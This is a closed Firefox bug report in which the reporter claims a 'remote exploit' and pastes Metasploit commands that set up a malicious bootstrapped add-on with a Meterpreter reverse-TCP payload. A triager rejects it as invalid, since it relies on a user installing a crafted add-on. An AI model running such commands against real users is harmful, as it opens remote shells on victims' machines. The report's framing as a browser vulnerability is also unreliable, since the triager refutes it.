Firefox Addon Bootstrap Exploit

RESOLVED INVALID

Status

()

Firefox
Untriaged
RESOLVED INVALID
6 years ago
6 years ago

People

(Reporter: skiller.rs1, Unassigned)

Tracking

15 Branch
x86_64
Windows 7
Points:
---

Firefox Tracking Flags

(Not tracked)

Details

Attachments

(1 attachment)

(Reporter)

Description

6 years ago
Created attachment 657948 [details]
a.png

User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0
Build ID: 20120824154833

Steps to reproduce:

Pentesting in Backtrack 5 R3 and found a huge remote exploit in Firefox.


Code:
msf>use exploit/multi/browser/firefox_xpi_bootstrapped_addon

msf>set payload windows/meterpreter/reverse_tcp

msf>set lport 81

msf> set lhost 0.0.0.0

msf> set srvhost  yourip

msf> show targets

   Id  Name
   --  ----
   0   Generic (Java Payload)
   1   Windows x86 (Native Payload)
   2   Linux x86 (Native Payload)
   3   Mac OS X PPC (Native Payload)
   4   Mac OS X x86 (Native Payload)

msf> set target 1

msf > exploit


Actual results:

I was able to gain remote access to a PC, and was able to install malicious software if it was for malicious intentions.


Expected results:

The exploit shouldn't have existed in the first place.
this is not security sensitive
this is a module that creates a malicious xpi that is an attempt to get the user to install a crafted add-on
since add-ons can have chrome privileges they can do just about anything
Group: core-security
Status: UNCONFIRMED → RESOLVED
Last Resolved: 6 years ago
Resolution: --- → INVALID
You need to log in before you can comment on or make changes to this bug.